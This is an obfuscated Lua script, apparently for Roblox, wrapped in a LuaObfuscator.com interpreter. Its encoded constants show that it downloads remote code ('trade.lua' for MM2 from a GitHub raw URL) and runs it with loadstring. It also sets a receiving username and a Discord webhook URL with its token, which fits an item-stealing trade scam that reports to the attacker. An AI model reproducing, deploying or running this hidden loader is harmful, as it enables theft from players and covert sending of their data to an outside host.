--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v5(v82,v19);v19=nil;v88=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((1 + 0) -0)) -(v32-((1 + 1) -1))) + (620 -((1432 -(282 + 595)) + 64)))) ;return v83-(v83%1) ;else local v84=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=(2336 -(226 + 1044)) -(68 + 997) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v37 * (251 + 5)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 1 + 3 ;return (v41 * (16778173 -(892 + 65))) + (v40 * 65536) + (v39 * (610 -354)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1 -0 ,1207 -(1069 + (890 -(201 + 571))) ) * (((1141 -(116 + 1022)) -1)^(69 -37))) + v42 ;local v46=v20(v43,4 + 17 ,381 -(87 + 263) );local v47=((v20(v43,212 -(67 + 113) )==(1 + 0 + 0)) and  -1) or ((3 + 0) -2) ;if (v46==(0 -(0 -0))) then if (v45==(0 + 0)) then return v47 * (0 -(0 + 0)) ;else v46=953 -(802 + 150) ;v44=0 -0 ;end elseif (v46==(6535 -4488)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2020 -(915 + (299 -217))) ) * (v44 + (v45/((432 -(44 + 386))^(147 -95)))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(3 -2)) then v50=v3(v16,v18,(v18 + v48) -(860 -(814 + 45)) );v18=v18 + v48 ;v49=4 -2 ;end if (v49==(1 + (3 -2))) then v51={};for v90=1 + (0 -0) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=888 -(261 + 246 + 378) ;end if (v49==(0 -0)) then v50=nil;if  not v48 then local v96=0 -0 ;while true do if (v96==(1080 -(1020 + 60))) then v48=v23();if (v48==0) then return "";end break;end end end v49=1;end if (v49==(1426 -(630 + 793))) then return v6(v51);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 290 -(60 + 230) ;end)();while true do if (v66~=(572 -(426 + 146))) then else if (v52==(868 -(550 + 317))) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v52=(function() return 2;end)();end if (0==v52) then local v97=(function() return 811 -(569 + 242) ;end)();local v98=(function() return;end)();while true do if (v97~=0) then else v98=(function() return 0 -0 ;end)();while true do if (v98~=0) then else v53=(function() return function(v172,v173,v174) local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if ((0 + 0)==v175) then v176=(function() return 1024 -(706 + 318) ;end)();while true do if (v176==(285 -(134 + 151))) then v172[v173-#"/" ]=(function() return v174();end)();return v172,v173,v174;end end break;end end end;end)();v54=(function() return {};end)();v98=(function() return 1666 -(970 + 695) ;end)();end if (v98~=1) then else v55=(function() return {};end)();v52=(function() return 2 -1 ;end)();break;end end break;end end end v66=(function() return 1 -0 ;end)();end if (v66==(701 -(271 + 429))) then if (v52==(3 + 0)) then for v100= #"|",v23() do local v101=(function() return v21();end)();if (v20(v101, #",", #"\\")~=(1500 -(1408 + 92))) then else local v118=(function() return 1990 -(582 + 1408) ;end)();local v119=(function() return;end)();local v120=(function() return;end)();local v121=(function() return;end)();local v122=(function() return;end)();while true do if (v118==(6 -4)) then while true do if (v119== #"-19") then if (v20(v121, #"91(", #"xnx")~= #" ") then else v122[ #"asd1"]=(function() return v59[v122[ #"0313"]];end)();end v54[v100]=(function() return v122;end)();break;end if ( #"/"==v119) then local v180=(function() return 0 -0 ;end)();while true do if (v180==(3 -2)) then v119=(function() return 2;end)();break;end if (v180~=(1824 -(1195 + 629))) then else v122=(function() return {v22(),v22(),nil,nil};end)();if (v120==(241 -(187 + 54))) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187~=(1171 -(418 + 753))) then else v188=(function() return 0 + 0 ;end)();while true do if (0~=v188) then else v122[ #"xxx"]=(function() return v22();end)();v122[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v120== #":") then v122[ #"xnx"]=(function() return v23();end)();elseif (v120==(1 + 1)) then v122[ #"nil"]=(function() return v23() -(2^16) ;end)();elseif (v120~= #"19(") then else local v195=(function() return 780 -(162 + 618) ;end)();while true do if (v195==0) then v122[ #"91("]=(function() return v23() -((2 + 0)^16) ;end)();v122[ #"0836"]=(function() return v22();end)();break;end end end v180=(function() return 1 + 0 ;end)();end end end if (v119==0) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if ((0 + 0)==v181) then v182=(function() return 0 -0 ;end)();while true do if (v182==(0 -0)) then v120=(function() return v20(v101,1 + 1 , #"19(");end)();v121=(function() return v20(v101, #"?id=",1642 -(1373 + 263) );end)();v182=(function() return 1001 -(451 + 549) ;end)();end if (v182==(1 + 0)) then v119=(function() return  #":";end)();break;end end break;end end end if (v119~=(1 + 1)) then else local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if ((0 -0)==v183) then v184=(function() return 1384 -(746 + 638) ;end)();while true do if (1==v184) then v119=(function() return  #"asd";end)();break;end if ((0 + 0)==v184) then if (v20(v121, #"}", #">")== #"~") then v122[4 -2 ]=(function() return v59[v122[2]];end)();end if (v20(v121,2 -0 ,5 -3 )~= #" ") then else v122[ #"nil"]=(function() return v59[v122[ #"91("]];end)();end v184=(function() return 1;end)();end end break;end end end end break;end if (v118==(1901 -(106 + 1794))) then local v163=(function() return 0;end)();while true do if (v163~=0) then else v121=(function() return nil;end)();v122=(function() return nil;end)();v163=(function() return 1;end)();end if (v163==1) then v118=(function() return 2;end)();break;end end end if ((0 + 0)==v118) then local v164=(function() return 341 -(218 + 123) ;end)();while true do if (v164==(0 -0)) then v119=(function() return 0;end)();v120=(function() return nil;end)();v164=(function() return 1;end)();end if (v164==1) then v118=(function() return 1582 -(1535 + 46) ;end)();break;end end end end end end for v102= #"]",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end if (v52~=(2 + 0)) then else v59=(function() return {};end)();for v103= #"|",v58 do local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=(114 -(4 + 110))) then else local v126=(function() return 584 -(57 + 527) ;end)();while true do if (v126==1) then v104=(function() return 561 -(306 + 254) ;end)();break;end if ((0 + 0)==v126) then v105=(function() return 0;end)();v106=(function() return nil;end)();v126=(function() return 1 -0 ;end)();end end end if (v104==(1468 -(899 + 568))) then v107=(function() return nil;end)();while true do if (v105~=1) then else if (v106== #"|") then v107=(function() return v21()~=(0 + 0) ;end)();elseif (v106==2) then v107=(function() return v24();end)();elseif (v106~= #"gha") then else v107=(function() return v25();end)();end v59[v103]=(function() return v107;end)();break;end if (v105==(0 + 0)) then v106=(function() return v21();end)();v107=(function() return nil;end)();v105=(function() return 1 -0 ;end)();end end break;end end end v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 7 -4 ;end)();end break;end end end end local function v29(v60,v61,v62) local v63=v60[167 -(122 + 44) ];local v64=v60[2 -0 ];local v65=v60[9 -6 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=(217 -(42 + 174)) + 0 ;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -(1 -0) ;local v76={};local v77={};for v85=65 -(30 + 35) ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 + 0 ];end end local v78=(v75-v69) + ((946 + 312) -(1043 + 214)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[3 -2 ];if (v80<=5) then if ((3287<4046) and (v80<=(1214 -(323 + 737 + 152)))) then if (v80<=0) then local v108=v79[2];v77[v108]=v77[v108](v13(v77,v108 + 1 + 0 ,v72));elseif (v80>((1506 -(363 + 1141)) -1)) then if ((v77[v79[582 -(361 + 219) ]]==v79[4]) or (2318==4700)) then v71=v71 + 1 ;else v71=v79[323 -(53 + 267) ];end else v62[v79[3]]=v77[v79[1 + 1 ]];end elseif (v80<=(416 -(15 + 398))) then v77[v79[984 -(18 + 964) ]]=v79[(1591 -(1183 + 397)) -8 ];elseif ((v80>(3 + (2 -1))) or (142==1447)) then v71=v79[2 + 0 + 1 ];else do return;end end elseif (v80<=(858 -(20 + 830))) then if (v80<=6) then local v112=v79[2];local v113,v114=v70(v77[v112](v13(v77,v112 + 1 ,v79[3 + 0 ])));v72=(v114 + v112) -(127 -(116 + 10)) ;local v115=0 + 0 ;for v123=v112,v72 do v115=v115 + ((553 + 186) -(542 + 196)) ;v77[v123]=v113[v115];end elseif (v80==(14 -(1982 -(1913 + 62)))) then v77[v79[1 + 0 + 1 ]]();else local v130;local v131,v132;local v133;local v134;v77[v79[(5 -3) + 0 ]]=v62[v79[2 + (1934 -(565 + 1368)) ]];v71=v71 + (2 -1) ;v79=v67[v71];v134=v79[4 -2 ];v133=v77[v79[(5844 -4290) -(1126 + (2086 -(1477 + 184))) ]];v77[v134 + (406 -(118 + 287)) ]=v133;v77[v134]=v133[v79[4]];v71=v71 + (3 -(2 -0)) ;v79=v67[v71];v77[v79[2]]=v79[1124 -(118 + 1003) ];v71=v71 + (2 -1) ;v79=v67[v71];v134=v79[2];v131,v132=v70(v77[v134](v13(v77,v134 + 1 ,v79[3])));v72=(v132 + v134) -(378 -(142 + 235)) ;v130=0;for v161=v134,v72 do local v162=0 -0 ;while true do if (v162==(0 + 0)) then v130=v130 + (978 -(553 + 396 + 28)) ;v77[v161]=v131[v130];break;end end end v71=v71 + (1 -0) ;v79=v67[v71];v134=v79[2 + (856 -(564 + 292)) ];v77[v134]=v77[v134](v13(v77,v134 + 1 + (0 -0) ,v72));v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1 + 1 ]]();v71=v71 + 1 + 0 ;v79=v67[v71];v71=v79[6 -3 ];end elseif ((v80<=(24 -(45 -30))) or (647==4687)) then v77[v79[4 -(306 -(244 + 60)) ]]=v62[v79[3]];elseif (v80==(3 + 7)) then local v148=0 -0 ;local v149;local v150;while true do if (v148==(753 -(239 + 396 + 118))) then v149=v79[2];v150=v77[v79[479 -(41 + 435) ]];v148=1 + 0 ;end if ((943<=4776) and (v148==(1330 -((1798 -(938 + 63)) + 532)))) then v77[v149 + 1 + 0 ]=v150;v77[v149]=v150[v79[4 + 0 ]];break;end end else v62[v79[2 + 1 ]]=v77[v79[(1129 -(936 + 189)) -2 ]];v71=v71 + (1203 -(123 + 250 + 829)) ;v79=v67[v71];v77[v79[733 -(476 + 255) ]]=v79[1133 -(369 + 761) ];v71=v71 + 1 + (1613 -(1565 + 48)) ;v79=v67[v71];v62[v79[3]]=v77[v79[2]];v71=v71 + (1 -0) ;v79=v67[v71];v77[v79[3 -1 ]]=v79[241 -(64 + 174) ];v71=v71 + 1 + 0 + 0 ;v79=v67[v71];v71=v79[3 -0 ];end v71=v71 + ((1475 -(782 + 356)) -(144 + 192)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F2O4D322F6D61696E2F74726164652E6C756103083O00557365724E616D65030D3O007370656369616C666F6E74657203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313237393436333039383432373634313835372F786442376348756D6B706A435842494F4D4B675645583669703646505A70786A56324E796361764A72735A636C54307174526F5776526A4C494E486259717A577259314500143O0012033O00013O0026023O000B000100020004053O000B0001001209000100033O001208000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026023O0001000100010004053O00010001001203000100083O00120B000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00043O00017O00",v9(),...);
